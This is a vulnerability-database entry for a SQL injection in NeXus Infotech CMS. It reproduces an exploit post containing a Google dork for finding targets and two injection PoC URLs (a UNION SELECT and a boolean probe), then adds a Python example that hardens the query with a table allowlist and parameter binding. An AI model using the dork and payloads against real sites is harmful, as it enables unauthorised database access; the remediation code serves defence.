NeXus Infotech CMS SQL Injection

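Vulnerability ID 1047502 Vulnerability type
Published 2012-05-08 Updated 2012-05-08
CVE ID N/A CNNVD-ID N/A
Affected platform N/A CVSS score N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2012050060
|Vulnerability details
Vulnerability details have not yet been disclosed
|Vulnerability EXP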
#  Exploit title : NeXus Infotech CMS SQL Injection Vulnerability
#  Date : May 05,2012
#  Author : gr00ve_hack3r
#  Contact : groove.hacker7/a/t/gmail.com
#  Homepage : www.gr00ve-hack3r.com
#  Vendor : NeXus Infotech
#  Vendor Site : http://www.nexusinfotech.org/
#  Google Dork : intext:"Powered By NeXus Infotech"

#  Vulnerability :

The GET parameters "table" and "p_id" accept unsanitised user input,
resulting in SQL injection which can lead to server compromise

#  PoC Exploit :

[+] http://[host].com/index.php?pagename=photogallery&table=photogallery
UNION ALL SELECT 1, 1, CONCAT(CHAR(1),CHAR(1),CHAR(1))#
[+] http://www.[host].com/details.asp?p_id=1 AND 2=2
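
The two parameters named in the advisory need different fixes: "table" is an SQL identifier, which cannot be bound as a query parameter, while "p_id" is a value, which can. The following is an added example, not code from the advisory or from the vendor; it uses Python with sqlite3 as a stand-in for the CMS, and the schema, sample rows and function names are assumptions constructed for illustration.

```python
import sqlite3

# Assumption: the only tables the gallery page is ever meant to read from.
ALLOWED_TABLES = {"photogallery"}

def build_db():
    """Constructed sample data standing in for the CMS database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE photogallery (p_id INTEGER PRIMARY KEY, title TEXT, file TEXT)")
    db.execute("CREATE TABLE users (id INTEGER, login TEXT, pw TEXT)")
    db.executemany("INSERT INTO photogallery VALUES (?, ?, ?)",
                   [(1, "Office", "a.jpg"), (2, "Team", "b.jpg")])
    db.execute("INSERT INTO users VALUES (1, 'admin', 'constructed-hash')")
    return db

def vulnerable_query(table, p_id):
    """The pattern the advisory describes: both inputs concatenated into SQL.
    Only builds the string, to show that input becomes query syntax."""
    return "SELECT p_id, title, file FROM " + table + " WHERE p_id = " + p_id

def safe_fetch(db, table, p_id):
    """Hardened form: allowlist the identifier, validate and bind the value."""
    # Identifiers cannot be bound, so compare against a fixed set of names.
    if table not in ALLOWED_TABLES:
        raise ValueError("unknown table")
    # p_id must be a plain ASCII integer; reject anything else before querying.
    if not (p_id.isascii() and p_id.isdigit()):
        raise ValueError("p_id must be numeric")
    sql = f"SELECT p_id, title, file FROM {table} WHERE p_id = ?"
    return db.execute(sql, (int(p_id),)).fetchall()

def is_rejected(db, table, p_id):
    """True when safe_fetch refuses the input instead of running a query."""
    try:
        safe_fetch(db, table, p_id)
        return False
    except ValueError:
        return True

if __name__ == "__main__":
    db = build_db()
    print(vulnerable_query("photogallery", "1 AND 2=2"))   # input became SQL
    print(safe_fetch(db, "photogallery", "1"))             # normal request
    print(is_rejected(db, "photogallery", "1 AND 2=2"))    # refused
```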